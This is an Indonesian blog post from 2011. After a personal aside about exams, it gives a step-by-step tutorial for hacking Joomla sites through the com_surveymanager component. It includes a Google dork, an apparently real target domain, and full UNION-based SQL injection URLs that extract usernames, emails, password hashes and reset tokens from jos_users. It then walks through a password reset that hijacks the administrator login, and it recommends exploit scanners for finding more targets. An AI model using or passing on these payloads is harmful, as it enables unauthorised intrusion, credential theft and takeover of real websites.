Kamis, 25 Agustus 2011

Reset Joomla dari Nol


Hai sobat Blogger semua? Lama tidak posting lagi, semenjak kesibukan mempersiapkan UN, lalu disusul UAS, dan kemudian hal paling mendebarkan, yaitu SNMPTN. Penulis jadi tidak sempat meng-update.  Tidak hanya sampai situ, dilanjut tes-tes lainnya sebagai cadangan kalau-kalau tidak tembus SNMPTN. Dengan berat hati, ternyata ‘tidak lulus’ SNMPTN saudara-saudara.  Bingung. Belum ada satupun cadangan waktu itu. Sebenarnya sih ada, tapi sudah expired, yaitu diterima di Universitas Gunadarma, Universitas Bakrie, dan Universitas Komputer Indonesia. Semuanya di jurusan Informatika. Tapi apalah daya, nunggu SNMPTN sampe pada expired semua. Kenapa ga DP dulu? Dikira cicilan laptop? Hmm.. alasannya simpel, biaya. Oh, kenapa masalah klasik masih ada di Indonesia? Seandainya ga pada korupsi, pasti makmur. Tapi yaa, seandainya tetap seandainya. Lalu dimana saya sekarang?? Tenang, saya tetap masih bisa kuliah. Di IT Telkom Bandung. Tepatnya di jurusan Ilmu Komputasi. Kok jadi curhat ya? ^_^v  Ok deh lanjut tutorialnya. Credit ke milw0rm.com
OK, pertama sediain dulu dork-nya : option=com_surveymanager
Terus cari targetnya. Anggap udah dapet http://www.yourwedding.com.au
Exploit-nya : -2+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6+from+jos_users—
Hmm.. disini pake teknik reset Joomla

Caranya : 
untuk masuk halaman reset >>> index.php?option=com_user&view=reset
                Jadinya http://www.yourwedding.com.au/index.php?option=com_user&view=reset

untuk mendapatkan email setelah concat (0x3a,username,0x3a,email,0x3a,password,0x3a,activation)
                Jadinya http://www.yourwedding.com.au/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws%280x3a,username,0x3a,email,0x3a,password,0x3a,activation%29,3,4,5,6+from+jos_users--

untuk masuk halaman token >>> index.php?option=com_user&view=reset&layout=confirm
                Jadinya http://www.yourwedding.com.au/index.php?option=com_user&view=reset&layout=confirm

untuk mendapatkan token setelah concat (0x3a,username,0x3a,email,0x3a,0x3a,activation)
                Jadinya http://www.yourwedding.com.au/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws%280x3a,username,0x3a,email,0x3a,0x3a,activation%29,3,4,5,6+from+jos_users--

Udah di reset Joomla tinggal >>> http://www.yourwedding.com.au/administrator/
Masukin dah tuh user n password-nya yang tadi sudah di reset.
Oiya, untuk tambahan, cari target yang vurn pake exploit scanner ajah biar cepet.. :D kayak pepatah “Biar cepat yang penting selamat”.

0 komentar:

Posting Komentar

Baca juga

Cari Blog Ini

Sms-online gratis

Link Excharge
 
Powered by Blogger